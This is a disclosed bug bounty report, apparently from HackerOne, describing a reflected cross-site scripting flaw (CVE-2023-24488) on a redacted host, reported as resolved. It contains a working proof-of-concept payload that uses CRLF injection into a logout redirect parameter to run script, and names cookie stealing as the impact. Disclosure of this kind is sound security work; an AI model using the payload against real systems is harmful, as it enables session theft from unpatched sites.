CVE-2023-24488 xss on https://██████/

Disclosed: 2023-09-08 17:20:58 By 0xmaruf To deptofdefense

Medium

Vulnerability Details

**Description:** ## References ## Impact malicios js inejction , cookie stealing ## System Host(s) █████████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2023-24488 ## Steps to Reproduce 1. `https://█████/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>` ## Suggested Mitigation/Remediation Actions

Actions

View on HackerOne

Report Stats

Report ID: 2045549
State: Closed
Substate: resolved
Upvotes: 6

CVE-2023-24488 xss on https://██████/

Vulnerability Details

Actions

Report Stats

Share this report